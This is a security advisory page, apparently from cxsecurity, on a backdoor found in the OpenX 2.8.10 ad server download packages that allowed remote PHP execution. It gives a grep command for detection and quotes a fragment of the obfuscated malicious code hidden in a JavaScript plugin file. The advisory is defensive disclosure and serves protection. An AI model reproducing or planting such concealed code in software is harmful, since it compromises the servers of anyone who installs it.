OpenX-2.8.10 backdoor

2013.08.07
Credit: xclose
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Backdoor in current download packages of OpenX-2.8.10 06.08.13 (Allgemein) by accident we stumbled across what seems to be a backdoor in the dowload archive (.zip, .bz2, .tgz) of the current version of the OpenX software. It allows arbitrary PHP code to be executed from remote. The problem is currently exploited in the wild. This is critical and needs immediate reaction. If you&#8217;re the admin of an openx adserver, you can verify if you installation contains the backdoor: find . -name \*.js -exec grep -l '<?php' {} \; When you get a result, it is the infected code this.each(function(){l=flashembed(this,k,j)} {jQuery.tools=jQuery.tools||{version: {}};jQuery.tools.version.flashembed='1.0.2'; */$j='ex'./**/'plode'; /* if(this.className ... In combination, another part of manipulated code uses require_once() instead of file_get_contents() so serve it. If you&#8217;re not serving videos you can get rid of the infected plugin by deleting the plugin openXVideoAds. For german version see: http://www.heise.de/security/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html Update: The OpenX security team has removed the invected packages and is working on an advisory.

Referencje:

http://xclose.de/wordpress/268/backdoor-in-current-download-packages-of-openx-2-8-10


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top